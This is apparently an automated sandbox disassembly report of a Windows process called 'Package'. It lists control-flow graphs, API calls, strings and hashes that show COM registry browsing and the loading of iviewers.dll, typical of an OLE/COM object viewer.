                                                                          • GetUserDefaultLCID.KERNEL32(00000000), ref: 00D364EA
                                                                          • StringFromGUID2.OLE32(?,?,00000050), ref: 00D36589
                                                                          • wsprintfW.USER32 ref: 00D365C8
                                                                          • RegOpenKeyW.ADVAPI32(80000000,Component Categories,00000000), ref: 00D36750
                                                                          • RegEnumKeyW.ADVAPI32(00000000,00000000,?,00000050), ref: 00D36789
                                                                          • RegOpenKeyW.ADVAPI32(00000000,?,?), ref: 00D367AB
                                                                          • RegQueryValueExW.ADVAPI32(?,409,00000000,00000000,?,00000200), ref: 00D367E0
                                                                          • wsprintfW.USER32 ref: 00D36813
                                                                          • RegCloseKey.ADVAPI32(?), ref: 00D3690C
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D20000, based on PE: true
                                                                          • Associated: 00000005.00000002.2330953250.0000000000D20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331006021.0000000000D43000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331026974.0000000000D44000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_d20000_Package.jbxd
                                                                          Similarity
                                                                          • API ID: Openwsprintf$CloseCreateDefaultEnumFromInstanceQueryStringUserValue
                                                                          • String ID: %s <no name>$409$Component Categories$_%S <no name>$g
                                                                          • API String ID: 3086071695-2486616072
                                                                          • Opcode ID: 4fb7387acf02a7f6a52ac2af16065032eb78a1b18255a767ac11b2b37f0b128d
                                                                          • Instruction ID: 09fd5e25ca88bcb39759c675a3e74ef8c12b86be53890937fcd50dbf600c2058
                                                                          • Opcode Fuzzy Hash: 4fb7387acf02a7f6a52ac2af16065032eb78a1b18255a767ac11b2b37f0b128d
                                                                          • Instruction Fuzzy Hash: C8E10D75A00228DFDB60DF64DC45BA9B7BAFB98315F1041E6E409E7250DB729EA4CF20

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 0 d2dba0-d2dbbe 1 d2dbc4-d2dbd1 0->1 2 d2e15d-d2e16b call d3f3a0 0->2 4 d2dbd3-d2dc1c #6195 #1143 LoadIconW SendMessageW #6195 call d2e409 1->4 5 d2dc21-d2dc3f #1662 lstrcmpW 1->5 4->2 8 d2dc41-d2dc98 #6195 * 2 #1143 LoadIconW SendMessageW call d39b32 call d2e466 5->8 9 d2dc9d-d2dcb8 memcmp 5->9 33 d2e156-d2e158 #2644 8->33 10 d2de59-d2de8e StringFromGUID2 #6195 * 2 9->10 11 d2dcbe-d2dccd 9->11 17 d2deb0-d2deb3 10->17 18 d2de90-d2deab call d39b32 call d2e466 10->18 15 d2dce1-d2dcee #6195 11->15 16 d2dccf-d2dcdf #6195 11->16 22 d2dcef-d2dd30 #1143 LoadIconW SendMessageW #6195 15->22 16->22 20 d2ded2-d2ded5 17->20 21 d2deb5-d2decd call d39b32 call d2e466 17->21 50 d2e136-d2e142 #1143 LoadIconW 18->50 26 d2def7-d2defa 20->26 27 d2ded7-d2def2 call d39b32 call d2e466 20->27 21->50 28 d2dd32-d2dd51 RegOpenKeyExW 22->28 29 d2dda6-d2dda9 22->29 38 d2df00-d2df03 26->38 39 d2e11e-d2e134 call d39b32 call d2e466 26->39 27->50 36 d2dd92-d2dda4 call d39b32 call d2e466 28->36 37 d2dd53-d2dd8c #6195 #1143 LoadIconW SendMessageW RegCloseKey 28->37 31 d2dde7-d2dde9 call d2e409 29->31 32 d2ddab-d2dde5 call d39b32 call d2e466 #1143 LoadIconW SendMessageW 29->32 53 d2ddee-d2de04 lstrcmpW 31->53 32->53 33->2 36->53 37->36 38->39 48 d2df09-d2dfbf call d39b32 call d2c6a6 call d30b66 call d2f616 call d2cb16 call d2e1a4 wsprintfW RegOpenKeyExW 38->48 39->50 48->33 80 d2dfc5-d2dff0 RegQueryValueW 48->80 58 d2e144 50->58 60 d2de06-d2de25 #1143 LoadIconW SendMessageW 53->60 61 d2de2b-d2de3b lstrcmpW 53->61 67 d2e145-d2e150 SendMessageW 58->67 60->61 61->33 69 d2de41-d2de54 #1143 LoadIconW 61->69 67->33 69->58 81 d2dff6-d2e00a call d3dc89 80->81 82 d2e079-d2e08e call d2d944 80->82 87 d2e00c-d2e012 81->87 88 d2e01d-d2e027 81->88 89 d2e090-d2e0a5 call d2d944 82->89 90 d2e0fe-d2e10d RegCloseKey 82->90 87->88 91 d2e014-d2e019 87->91 92 d2e057-d2e073 #1165 ExtractIconW 88->92 93 d2e029-d2e050 lstrcpyW wcsrchr 88->93 89->90 99 d2e0a7-d2e0bc call d2d944 89->99 94 d2e113-d2e117 90->94 95 d2e10f-d2e111 90->95 91->88 92->82 92->90 93->92 97 d2e052-d2e054 93->97 94->39 95->67 97->92 99->90 102 d2e0be-d2e0d3 call d2d944 99->102 102->90 105 d2e0d5-d2e0ea call d2d944 102->105 105->90 108 d2e0ec-d2e0fc call d2d944 105->108 108->90
                                                                          APIs
                                                                          • #6195.MFC42U(00D221A0), ref: 00D2DBDB
                                                                          • #1143.MFC42U(00000093,0000000E,00000093,00D221A0), ref: 00D2DBE9
                                                                          • LoadIconW.USER32(00000000,00000093), ref: 00D2DBEF
                                                                          • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00D2DC03
                                                                          • #6195.MFC42U(00D221A0), ref: 00D2DC10
                                                                            • Part of subcall function 00D2E409: SendMessageW.USER32(?,00001304,00000000,00000000), ref: 00D2E41E
                                                                            • Part of subcall function 00D2E409: SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00D2E436
                                                                            • Part of subcall function 00D2E409: SendMessageW.USER32(?,00001309,00000000,00000000), ref: 00D2E451
                                                                            • Part of subcall function 00D2E409: #6211.MFC42U(00000000), ref: 00D2E45E
                                                                          • #1662.MFC42U ref: 00D2DC2A
                                                                          • lstrcmpW.KERNEL32(?,Application IDs), ref: 00D2DC37
                                                                          • #6195.MFC42U(Application IDs), ref: 00D2DC4C
                                                                          • #6195.MFC42U(All HKEY_CLASSES_ROOT\APPID Entries,Application IDs), ref: 00D2DC58
                                                                          • #1143.MFC42U(00000094,0000000E,00000094,All HKEY_CLASSES_ROOT\APPID Entries,Application IDs), ref: 00D2DC66
                                                                          • LoadIconW.USER32(00000000,00000094), ref: 00D2DC6C
                                                                          • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00D2DC80
                                                                          • #2644.MFC42U ref: 00D2E158
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D20000, based on PE: true
                                                                          • Associated: 00000005.00000002.2330953250.0000000000D20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331006021.0000000000D43000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331026974.0000000000D44000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_d20000_Package.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSend$#6195$#1143IconLoad$#1662#2644#6211lstrcmp
                                                                          • String ID: All HKEY_CLASSES_ROOT\APPID Entries$All HKEY_CLASSES_ROOT\Component Categories Entries$Application IDs$CLSID\%s$Component Categories$DefaultIcon$InprocHandler$InprocHandler32$InprocServer$InprocServer32$Interfaces$LocalServer$LocalServer32$No CLSID available.$Type Libraries
                                                                          • API String ID: 3415864282-4228781962
                                                                          • Opcode ID: 21a7e715f8c36d4aca4dd0433eb402c26259999e82c5482299f82ab5efd142e7
                                                                          • Instruction ID: 5401df776779b3604d21eeef056ef0491669c5c00957c1a180869ba6cebe9b02
                                                                          • Opcode Fuzzy Hash: 21a7e715f8c36d4aca4dd0433eb402c26259999e82c5482299f82ab5efd142e7
                                                                          • Instruction Fuzzy Hash: E3E1C771540324ABDB21BF30EC86FAA776AEF56708F040474F949AB192DBB49D85CB70

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 111 d2f616-d2f6a7 call d3f415 #540 StringFromGUID2 SendMessageW call d3d67d 116 d2f6a9 111->116 117 d2f6ae-d2f6fa #861 call d3d67d 111->117 116->117 120 d2f6fe-d2f715 #6195 117->120 121 d2f6fc 117->121 122 d2f71b-d2f71e 120->122 123 d2f98d-d2f9cd call d3d67d 120->123 121->120 124 d2f944-d2f97b call d3d67d 122->124 125 d2f724-d2f727 122->125 135 d2f9d4-d2f9f1 #861 #2756 123->135 136 d2f9cf 123->136 138 d2f982 124->138 139 d2f97d 124->139 127 d2f7f7-d2f82e call d3d67d 125->127 128 d2f72d-d2f730 125->128 148 d2f830-d2f846 #861 127->148 149 d2f84c-d2f856 #861 127->149 131 d2fc33-d2fc3c call d2f090 call d3020e 128->131 132 d2f736-d2f782 #3087 #2634 call d3d67d 128->132 162 d2fc41-d2fc5a #6330 #800 call d3f3c4 131->162 155 d2f784 132->155 156 d2f789-d2f7d0 #861 call d3d67d 132->156 142 d2f9f3-d2fa02 #2756 135->142 143 d2fa1b-d2fa6e SendMessageW call d3d67d 135->143 136->135 138->123 139->138 142->143 144 d2fa04-d2fa19 SendMessageW 142->144 152 d2fa82-d2fad1 #2634 call d3d67d 143->152 159 d2fa70-d2fa7d #861 143->159 144->152 150 d2f863-d2f898 call d3d67d 148->150 151 d2f848-d2f84a 148->151 153 d2f858-d2f85e #2634 149->153 168 d2f927 150->168 169 d2f89e-d2f8b2 lstrcmpiW 150->169 151->153 170 d2fb60 152->170 171 d2fad7-d2faeb lstrcmpiW 152->171 153->150 155->156 172 d2f7d2 156->172 173 d2f7d7-d2f7f2 #861 #2634 156->173 159->152 174 d2f92c-d2f933 168->174 176 d2f8b4-d2f8b9 169->176 177 d2f8bb-d2f8cf lstrcmpiW 169->177 175 d2fb65-d2fb6c 170->175 178 d2faf4-d2fb08 lstrcmpiW 171->178 179 d2faed-d2faf2 171->179 172->173 180 d2fc28-d2fc2e #2634 173->180 181 d2f939 SendMessageW 174->181 182 d2fb72-d2fbb5 SendMessageW call d3d605 175->182 176->174 183 d2f8d1-d2f8d6 177->183 184 d2f8d8-d2f8ec lstrcmpiW 177->184 185 d2fb11-d2fb25 lstrcmpiW 178->185 186 d2fb0a-d2fb0f 178->186 179->175 180->131 181->124 199 d2fbd0-d2fbe0 SendMessageW 182->199 200 d2fbb7-d2fbce SendMessageW 182->200 183->174 188 d2f8f5-d2f90f lstrcmpiW 184->188 189 d2f8ee-d2f8f3 184->189 190 d2fb27-d2fb2c 185->190 191 d2fb2e-d2fb48 lstrcmpiW 185->191 186->175 193 d2f920-d2f925 188->193 194 d2f911 188->194 189->174 190->175 195 d2fb4a 191->195 196 d2fb59-d2fb5e 191->196 197 d2f916-d2f91e 193->197 194->197 198 d2fb4f-d2fb57 195->198 196->198 197->181 198->182 201 d2fbe5-d2fc26 #861 #3087 #2634 #3087 #2634 * 2 199->201 200->201 201->180
                                                                          APIs
                                                                          • __EH_prolog3_GS.LIBCMT ref: 00D2F620
                                                                          • #540.MFC42U(0000025C,00D2DF5F), ref: 00D2F637
                                                                          • StringFromGUID2.OLE32(?,?,00000028,0000025C,00D2DF5F), ref: 00D2F64D
                                                                          • SendMessageW.USER32(?,0000014D,000000FF,None), ref: 00D2F669
                                                                          • #861.MFC42U(?), ref: 00D2F6B5
                                                                          • #6195.MFC42U(?,?,?,?,?), ref: 00D2F705
                                                                          • #3087.MFC42U(0000008B,00000001,?,?,?,?,?), ref: 00D2F73F
                                                                          • #2634.MFC42U(0000008B,00000001,?,?,?,?,?), ref: 00D2F746
                                                                          • #861.MFC42U(?,?,0000008B,00000001,?,?,?,?,?), ref: 00D2F790
                                                                          • #861.MFC42U(?,?,?,?,?,?,0000008B,00000001,?,?,?,?,?), ref: 00D2F7DE
                                                                          • #2634.MFC42U(00000000,?,?,?,?,?,?,0000008B,00000001,?,?,?,?,?), ref: 00D2F7EB
                                                                          • #861.MFC42U(?,00D221A0,?,00000100,?,?,?,?,?), ref: 00D2F837
                                                                          • #861.MFC42U(00D221A0,00D221A0,?,00000100,?,?,?,?,?), ref: 00D2F851
                                                                          • #2634.MFC42U(00000000,00D221A0,00D221A0,?,00000100,?,?,?,?,?), ref: 00D2F85E
                                                                          • lstrcmpiW.KERNEL32(?,BOTH,?,?,00000000,00D221A0,00D221A0,?,00000100,?,?,?,?,?), ref: 00D2F8AA
                                                                          • lstrcmpiW.KERNEL32(?,FREE,?,?,00000000,00D221A0,00D221A0,?,00000100,?,?,?,?,?), ref: 00D2F8C7
                                                                          • lstrcmpiW.KERNEL32(?,APARTMENT,?,?,00000000,00D221A0,00D221A0,?,00000100,?,?,?,?,?), ref: 00D2F8E4
                                                                          • lstrcmpiW.KERNEL32(?,NEUTRAL,?,?,00000000,00D221A0,00D221A0,?,00000100,?,?,?,?,?), ref: 00D2F901
                                                                          • SendMessageW.USER32(?,0000014D,000000FF,None), ref: 00D2F939
                                                                          • #861.MFC42U(?,00D221A0,?,00000100,?,?,?,?,?), ref: 00D2F9DD
                                                                          • #2756.MFC42U(msjava.dll,?,00D221A0,?,00000100,?,?,?,?,?), ref: 00D2F9E9
                                                                          • #2756.MFC42U(MSJAVA.DLL,msjava.dll,?,00D221A0,?,00000100,?,?,?,?,?), ref: 00D2F9FA
                                                                          • SendMessageW.USER32(?,000000F1,00000000,00000000), ref: 00D2FA13
                                                                          • SendMessageW.USER32(?,000000F1,00000001,00000000), ref: 00D2FA2A
                                                                          • #861.MFC42U(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00D2FA7D
                                                                          • #2634.MFC42U(00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00D2FA97
                                                                          • lstrcmpiW.KERNEL32(?,BOTH,?,?,?,00000000), ref: 00D2FAE3
                                                                          • lstrcmpiW.KERNEL32(?,FREE,?,?,?,00000000), ref: 00D2FB00
                                                                          • lstrcmpiW.KERNEL32(?,APARTMENT,?,?,?,00000000), ref: 00D2FB1D
                                                                          • lstrcmpiW.KERNEL32(?,NEUTRAL,?,?,?,00000000), ref: 00D2FB3A
                                                                          • SendMessageW.USER32(?,0000014D,000000FF,None), ref: 00D2FB72
                                                                          • SendMessageW.USER32(?,000000F1,00000001,00000000), ref: 00D2FBBF
                                                                          • SendMessageW.USER32(?,000000F1,00000000,00000000), ref: 00D2FBD8
                                                                          • #861.MFC42U(00D221A0,?,?,?,?,?,?,?,00000000), ref: 00D2FBEC
                                                                          • #3087.MFC42U(00001FA5,00D221A0,?,?,?,?,?,?,?,00000000), ref: 00D2FBF8
                                                                          • #2634.MFC42U(00000000,00001FA5,00D221A0,?,?,?,?,?,?,?,00000000), ref: 00D2FC00
                                                                          • #3087.MFC42U(0000009C,00000000,00001FA5,00D221A0,?,?,?,?,?,?,?,00000000), ref: 00D2FC0C
                                                                          • #2634.MFC42U(00000000,0000009C,00000000,00001FA5,00D221A0,?,?,?,?,?,?,?,00000000), ref: 00D2FC14
                                                                          • #2634.MFC42U(00000001,00000000,0000009C,00000000,00001FA5,00D221A0,?,?,?,?,?,?,?,00000000), ref: 00D2FC21
                                                                          • #2634.MFC42U(00000001,00000001,00000000,0000009C,00000000,00001FA5,00D221A0,?,?,?,?,?,?,?,00000000), ref: 00D2FC2E
                                                                          • #6330.MFC42U(00000000,00000001,00000001,00000000,0000009C,00000000,00001FA5,00D221A0,?,?,?,?,?,?,?,00000000), ref: 00D2FC45
                                                                          • #800.MFC42U(00000000,00000001,00000001,00000000,0000009C,00000000,00001FA5,00D221A0,?,?,?,?,?,?,?,00000000), ref: 00D2FC50
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D20000, based on PE: true
                                                                          • Associated: 00000005.00000002.2330953250.0000000000D20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331006021.0000000000D43000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331026974.0000000000D44000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_d20000_Package.jbxd
                                                                          Similarity
                                                                          • API ID: #2634#861lstrcmpi$MessageSend$#3087$#2756$#540#6195#6330#800FromH_prolog3_String
                                                                          • String ID: APARTMENT$Apartment$AppID$BOTH$Both$DllSurrogate$FREE$Free$InProcHandler32$InProcServer32$JavaClass$LocalServer32$LocalService$MSJAVA.DLL$NEUTRAL$Neutral$None$ServiceParameters$ThreadingModel$TreatAs$msjava.dll
                                                                          • API String ID: 3203418238-4284008715
                                                                          • Opcode ID: 488967a25f40af3d0b6e2624694e32ba45e23821afe35f93a12b3b6c0a01225b
                                                                          • Instruction ID: 6327aaff08a026e62adc09991985e0d1968818e1d7afe939c79d093d96215fae
                                                                          • Opcode Fuzzy Hash: 488967a25f40af3d0b6e2624694e32ba45e23821afe35f93a12b3b6c0a01225b
                                                                          • Instruction Fuzzy Hash: 1DF19731640329ABDF11EF20DD86FEA7379EF25704F0409B5B915AB1D1DBB19A888A70

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • __EH_prolog3_GS.LIBCMT ref: 00D2BBA0
                                                                          • #540.MFC42U(00000A30,00D31EC1,00000000,?,00000001), ref: 00D2BBB4
                                                                          • #4155.MFC42U(00000004,00000A30,00D31EC1,00000000,?,00000001), ref: 00D2BBC6
                                                                          • StringFromGUID2.OLE32(00D21980,?), ref: 00D2BBEB
                                                                          • wsprintfW.USER32 ref: 00D2BC04
                                                                          • RegQueryValueW.ADVAPI32(80000000,?,?,?), ref: 00D2BC27
                                                                          • #3516.MFC42U(?,Version,00000000), ref: 00D2BC42
                                                                          • #540.MFC42U(00000004,00000A30,00D31EC1,00000000,?,00000001), ref: 00D2BC56
                                                                          • #540.MFC42U(00000004,00000A30,00D31EC1,00000000,?,00000001), ref: 00D2BC64
                                                                          • GetModuleFileNameW.KERNEL32(00000000,?,00000208,00000004,00000A30,00D31EC1,00000000,?,00000001), ref: 00D2BC7A
                                                                          • wcsrchr.MSVCRT ref: 00D2BC92
                                                                          • lstrcpyW.KERNEL32(-00000002,IVIEWERS.DLL), ref: 00D2BCA3
                                                                          • #538.MFC42U(?), ref: 00D2BCB6
                                                                          • #4155.MFC42U(00000012), ref: 00D2BCD2
                                                                          • #4155.MFC42U(00000013,00000012), ref: 00D2BCDF
                                                                          • #940.MFC42U(?,00000013,00000012), ref: 00D2BCF1
                                                                          • #4155.MFC42U(00000015,?,00000013,00000012), ref: 00D2BCFE
                                                                          • #940.MFC42U(?,00000015,?,00000013,00000012), ref: 00D2BD10
                                                                          • #1197.MFC42U(?,00000004,00000000,?,00000015,?,00000013,00000012), ref: 00D2BD1F
                                                                          • #355.MFC42U(00000001,iviewers.dll,00000000,00001804,DLL Files (*.dll)|*.dll|AllFiles(*.*)|*.*|,?,?,00000004,00000000,?,00000015,?,00000013,00000012), ref: 00D2BD4B
                                                                          • #2507.MFC42U(00000001,iviewers.dll,00000000,00001804,DLL Files (*.dll)|*.dll|AllFiles(*.*)|*.*|,?,?,00000004,00000000,?,00000015,?,00000013,00000012), ref: 00D2BD5A
                                                                          • #3494.MFC42U(?,00000001,iviewers.dll,00000000,00001804,DLL Files (*.dll)|*.dll|AllFiles(*.*)|*.*|,?,?,00000004,00000000,?,00000015,?,00000013,00000012), ref: 00D2BD74
                                                                          • #858.MFC42U(00000000,?,00000001,iviewers.dll,00000000,00001804,DLL Files (*.dll)|*.dll|AllFiles(*.*)|*.*|,?,?,00000004,00000000,?,00000015,?,00000013,00000012), ref: 00D2BD84
                                                                          • #800.MFC42U(00000000,?,00000001,iviewers.dll,00000000,00001804,DLL Files (*.dll)|*.dll|AllFiles(*.*)|*.*|,?,?,00000004,00000000,?,00000015,?,00000013,00000012), ref: 00D2BD8F
                                                                          • #800.MFC42U(00000000,?,00000001,iviewers.dll,00000000,00001804,DLL Files (*.dll)|*.dll|AllFiles(*.*)|*.*|,?,?,00000004,00000000,?,00000015,?,00000013,00000012), ref: 00D2BD9E
                                                                          • #641.MFC42U(00000000,?,00000001,iviewers.dll,00000000,00001804,DLL Files (*.dll)|*.dll|AllFiles(*.*)|*.*|,?,?,00000004,00000000,?,00000015,?,00000013,00000012), ref: 00D2BDA9
                                                                          • LoadLibraryW.KERNELBASE(?,?), ref: 00D2BDB4
                                                                          • GetProcAddress.KERNEL32(00000000,DllRegisterServer), ref: 00D2BDCB
                                                                          • #800.MFC42U(00000001,iviewers.dll,00000000,00001804,DLL Files (*.dll)|*.dll|AllFiles(*.*)|*.*|,?,?,00000004,00000000,?,00000015,?,00000013,00000012), ref: 00D2BDF3
                                                                          • #641.MFC42U(00000001,iviewers.dll,00000000,00001804,DLL Files (*.dll)|*.dll|AllFiles(*.*)|*.*|,?,?,00000004,00000000,?,00000015,?,00000013,00000012), ref: 00D2BDFE
                                                                          • #4155.MFC42U(00000014), ref: 00D2BE11
                                                                          • #4155.MFC42U(00000013,00000014), ref: 00D2BE1E
                                                                          • #940.MFC42U(?,00000013,00000014), ref: 00D2BE30
                                                                          • #1197.MFC42U(?,00000000,00000000,?,00000013,00000014), ref: 00D2BE3F
                                                                          • FreeLibrary.KERNEL32(00000000,?,00000000,00000000,?,00000013,00000014), ref: 00D2BE4B
                                                                          • RegOpenKeyExW.ADVAPI32(80000000,Interface,00000000,000F003F,?,?,00000004,00000000,?,00000015,?,00000013,00000012), ref: 00D2BE69
                                                                          • StringFromGUID2.OLE32(00D29E6C,?,00000031), ref: 00D2BE84
                                                                          • StringFromGUID2.OLE32(00D29E7C,?,00000031,?,?,00000000,IClientSecurity), ref: 00D2BEAA
                                                                          • StringFromGUID2.OLE32(00D29E8C,?,00000031,?,?,00000000,IServerSecurity), ref: 00D2BED0
                                                                          • StringFromGUID2.OLE32(00D29E5C,?,00000031,?,?,00000000,IMallocSpy), ref: 00D2BEF6
                                                                          • RegCloseKey.ADVAPI32(?,?,?,00000000,IMultiQI), ref: 00D2BF18
                                                                          • #6398.MFC42U(?,Version,0000003D), ref: 00D2BF34
                                                                          • #800.MFC42U(?,Version,0000003D), ref: 00D2BF3F
                                                                          • #800.MFC42U(?,Version,0000003D), ref: 00D2BF4A
                                                                          • #800.MFC42U(?,Version,0000003D), ref: 00D2BF55
                                                                          • #800.MFC42U(?,Version,0000003D), ref: 00D2BF62
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D20000, based on PE: true
                                                                          • Associated: 00000005.00000002.2330953250.0000000000D20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331006021.0000000000D43000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331026974.0000000000D44000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_d20000_Package.jbxd
                                                                          Similarity
                                                                          • API ID: #800$#4155$FromString$#540#940$#1197#641Library$#2507#3494#3516#355#538#6398#858AddressCloseFileFreeH_prolog3_LoadModuleNameOpenProcQueryValuelstrcpywcsrchrwsprintf
                                                                          • String ID: Component Categories\%s$DLL Files (*.dll)|*.dll|AllFiles(*.*)|*.*|$DllRegisterServer$IClientSecurity$IMallocSpy$IMultiQI$IServerSecurity$IVIEWERS.DLL$Interface$Version$iviewers.dll
                                                                          • API String ID: 2887186624-2619698232
                                                                          • Opcode ID: d74cb4fe7c3983cfcdddb9397d9cb6128222841d5a11d638b7504dced1c7bdd8
                                                                          • Instruction ID: 2e5857ee232d26867012aab1bfa9a865ddb38c77ffeccbd16b212eb3e875ecc7
                                                                          • Opcode Fuzzy Hash: d74cb4fe7c3983cfcdddb9397d9cb6128222841d5a11d638b7504dced1c7bdd8
                                                                          • Instruction Fuzzy Hash: 27A16136A40328AADB20EB60EC56FDD7779EB26714F1040A5B605B61D1DB705F89CF32

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 238 d37a11-d37a3e 239 d37a40-d37a42 238->239 240 d37a47-d37a67 CLSIDFromString 238->240 241 d37efd-d37f08 call d3f3a0 239->241 242 d37a70-d37ab0 wsprintfW RegOpenKeyW 240->242 243 d37a69-d37a6b 240->243 244 d37ab6-d37ace call d379b1 242->244 245 d37efb 242->245 243->241 250 d37ad0-d37add 244->250 251 d37adf-d37ae5 244->251 245->241 252 d37aec-d37b17 RegQueryValueW 250->252 251->252 253 d37bb8-d37bd9 RegQueryValueW 252->253 254 d37b1d-d37b36 _wcsnicmp 252->254 255 d37c42-d37c5c RegOpenKeyW 253->255 256 d37bdb-d37bf4 _wcsnicmp 253->256 257 d37bb3 254->257 258 d37b38-d37b4c lstrcmpiW 254->258 260 d37c99-d37cb3 RegOpenKeyW 255->260 261 d37c5e-d37c65 255->261 256->255 259 d37bf6-d37c0a lstrcmpiW 256->259 257->255 262 d37ba6-d37bac 258->262 263 d37b4e-d37b62 lstrcmpiW 258->263 264 d37c38-d37c3e 259->264 265 d37c0c-d37c20 lstrcmpiW 259->265 269 d37cf0-d37d0a RegOpenKeyW 260->269 270 d37cb5-d37cbc 260->270 266 d37c67-d37c74 261->266 267 d37c76-d37c7c 261->267 262->257 263->262 268 d37b64-d37b78 lstrcmpiW 263->268 264->255 265->264 273 d37c22-d37c36 lstrcmpiW 265->273 274 d37c83-d37c8f RegCloseKey 266->274 267->274 268->262 275 d37b7a-d37b8e lstrcmpiW 268->275 271 d37d47-d37d81 RegCloseKey RegQueryValueW 269->271 272 d37d0c-d37d13 269->272 276 d37cbe-d37ccb 270->276 277 d37ccd-d37cd3 270->277 281 d37d87-d37dc1 wsprintfW RegOpenKeyW 271->281 282 d37e65-d37ea2 RegQueryValueW 271->282 279 d37d15-d37d22 272->279 280 d37d24-d37d2a 272->280 273->255 273->264 274->282 275->262 283 d37b90-d37ba4 lstrcmpiW 275->283 278 d37cda-d37ce6 RegCloseKey 276->278 277->278 278->282 286 d37d31-d37d3d RegCloseKey 279->286 280->286 287 d37dc3-d37dca 281->287 288 d37df8-d37e32 wsprintfW RegOpenKeyW 281->288 284 d37ec7-d37eda #861 282->284 285 d37ea4-d37ec5 RegQueryValueW 282->285 283->257 283->262 289 d37edf-d37ee6 284->289 285->284 285->289 286->282 290 d37ddb-d37de1 287->290 291 d37dcc-d37dd9 287->291 288->282 292 d37e34-d37e3b 288->292 293 d37ef4-d37ef7 289->293 294 d37ee8-d37eee RegCloseKey 289->294 295 d37de8-d37df4 RegCloseKey 290->295 291->295 296 d37e3d-d37e4a 292->296 297 d37e4c-d37e52 292->297 293->241 294->293 295->282 298 d37e59-d37e5f RegCloseKey 296->298 297->298 298->282
                                                                          APIs
                                                                          • CLSIDFromString.OLE32(00000000,?), ref: 00D37A54
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D20000, based on PE: true
                                                                          • Associated: 00000005.00000002.2330953250.0000000000D20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331006021.0000000000D43000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331026974.0000000000D44000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_d20000_Package.jbxd
                                                                          Similarity
                                                                          • API ID: FromString
                                                                          • String ID: %s\Insertable$%s\NotInsertable$($2.dll$2disp.dll$2pr32.dll$2prox.dll$32.dll$CLSID\%s$Control$InprocServer$InprocServer32$Insertable$Ole1Class$ProgID$ToolboxBitmap$ToolboxBitmap32$aut32.dll$cnv32.dll$ole$prx32.dll
                                                                          • API String ID: 1694596556-344945948
                                                                          • Opcode ID: 83af47e19cd8576314c5b39c25ce9b7912221ec310639330fa64098c36babb12
                                                                          • Instruction ID: 21ab82a43c9a887accc4289a415c30f8a21e2cd9c485babea7248c867d137e2f
                                                                          • Opcode Fuzzy Hash: 83af47e19cd8576314c5b39c25ce9b7912221ec310639330fa64098c36babb12
                                                                          • Instruction Fuzzy Hash: 86D1E3B5A44729EFDB309F60EC8DB9977B8BB24305F0405E5E519E22A1D7709E988F30

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • #3087.MFC42U(000000B2,00000000,?,00000000,?,00D2FC41,00000001,00000001,00000000,0000009C,00000000,00001FA5,00D221A0), ref: 00D3024A
                                                                          • #6211.MFC42U(000000B2,00000000,?,00000000,?,00D2FC41,00000001,00000001,00000000,0000009C,00000000,00001FA5,00D221A0), ref: 00D30251
                                                                          • #3087.MFC42U(00000089,00000000,000000B2,00000000,?,00000000,?,00D2FC41,00000001,00000001,00000000,0000009C,00000000,00001FA5,00D221A0), ref: 00D3025E
                                                                          • #6211.MFC42U(00000089,00000000,000000B2,00000000,?,00000000,?,00D2FC41,00000001,00000001,00000000,0000009C,00000000,00001FA5,00D221A0), ref: 00D30265
                                                                          • #3087.MFC42U(000000B6,00000000,00000089,00000000,000000B2,00000000,?,00000000,?,00D2FC41,00000001,00000001,00000000,0000009C,00000000,00001FA5), ref: 00D30272
